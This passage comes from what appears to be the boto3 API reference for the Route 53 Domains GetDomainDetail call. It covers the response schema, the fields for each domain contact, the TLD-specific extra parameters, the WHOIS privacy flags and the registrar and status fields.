TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
'TechContact': {
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
'AdminPrivacy': True|False,
'RegistrantPrivacy': True|False,
'TechPrivacy': True|False,
'RegistrarName': 'string',
'WhoIsServer': 'string',
'RegistrarUrl': 'string',
'AbuseContactEmail': 'string',
'AbuseContactPhone': 'string',
'RegistryDomainId': 'string',
'CreationDate': datetime(2015, 1, 1),
'UpdatedDate': datetime(2015, 1, 1),
'ExpirationDate': datetime(2015, 1, 1),
'Reseller': 'string',
'DnsSec': 'string',
'StatusList': [
'string',
]
}
Response Structure
(dict) --The GetDomainDetail response includes the following elements.
DomainName (string) --The name of a domain.
Nameservers (list) --The name of the domain.
(dict) --Nameserver includes the following elements.
Name (string) --The fully qualified host name of the name server.
Constraint: Maximum 255 characters
GlueIps (list) --Glue IP address of a name server entry. Glue IP addresses are required only when the name of the name server is a subdomain of the domain. For example, if your domain is example.com and the name server for the domain is ns.example.com, you need to specify the IP address for ns.example.com.
Constraints: The list can contain only one IPv4 and one IPv6 address.
(string) --
AutoRenew (boolean) --Specifies whether the domain registration is set to renew automatically.
AdminContact (dict) --Provides details about the domain administrative contact.
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code>]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) --The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limit\xc3\xa9e)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA.se
BIRTH_COUNTRY
SE_ID_NUMBER.sg
SG_ID_NUMBER.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) --The value that corresponds with the name of an extra parameter.
RegistrantContact (dict) --Provides details about the domain registrant.
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code>]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) --The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limit\xc3\xa9e)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA.se
BIRTH_COUNTRY
SE_ID_NUMBER.sg
SG_ID_NUMBER.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) --The value that corresponds with the name of an extra parameter.
TechContact (dict) --Provides details about the domain technical contact.
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code>]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) --The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limit\xc3\xa9e)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA.se
BIRTH_COUNTRY
SE_ID_NUMBER.sg
SG_ID_NUMBER.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) --The value that corresponds with the name of an extra parameter.
AdminPrivacy (boolean) --Specifies whether contact information is concealed from WHOIS queries. If the value is true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If the value is false , WHOIS queries return the information that you entered for the admin contact.
RegistrantPrivacy (boolean) --Specifies whether contact information is concealed from WHOIS queries. If the value is true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If the value is false , WHOIS queries return the information that you entered for the registrant contact (domain owner).
TechPrivacy (boolean) --Specifies whether contact information is concealed from WHOIS queries. If the value is true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If the value is false , WHOIS queries return the information that you entered for the technical contact.
RegistrarName (string) --Name of the registrar of the domain as identified in the registry. Domains with a .com, .net, or .org TLD are registered by Amazon Registrar. All other domains are registered by our registrar associate, Gandi. The value for domains that are registered by Gandi is "GANDI SAS" .
WhoIsServer (string) --The fully qualified name of the WHOIS server that can answer the WHOIS query for the domain.
RegistrarUrl (string) --Web address of the registrar.
AbuseContactEmail (string) --Email address to contact to report incorrect contact information for a domain, to report that the domain is being used to send spam, to report that someone is cybersquatting on a domain name, or report some other type of abuse.
AbuseContactPhone (string) --Phone number for reporting abuse.
RegistryDomainId (string) --Reserved for future use.
CreationDate (datetime) --The date when the domain was created as found in the response to a WHOIS query. The date and time is in Unix time format and Coordinated Universal time (UTC).
UpdatedDate (datetime) --The last updated date of the domain as found in the response to a WHOIS query. The date and time is in Unix time format and Coordinated Universal time (UTC).
ExpirationDate (datetime) --The date when the registration for the domain is set to expire. The date and time is in Unix time format and Coordinated Universal time (UTC).
Reseller (string) --Reseller of the domain. Domains registered or transferred using Route 53 domains will have "Amazon" as the reseller.
DnsSec (string) --Reserved for future use.
StatusList (list) --An array of domain name status codes, also known as Extensible Provisioning Protocol (EPP) status codes.
ICANN, the organization that maintains a central database of domain names, has developed a set of domain name status codes that tell you the status of a variety of operations on a domain name, for example, registering a domain name, transferring a domain name to another registrar, renewing the registration for a domain name, and so on. All registrars use this same set of status codes.
For a current list of domain name status codes and an explanation of what each code means, go to the ICANN website and search for epp status codes . (Search on the ICANN website; web searches sometimes return an old version of the document.)
(string) --
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'DomainName': 'string',
'Nameservers': [
{
'Name': 'string',
'GlueIps': [
'string',
]
},
],
'AutoRenew': True|False,
'AdminContact': {
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
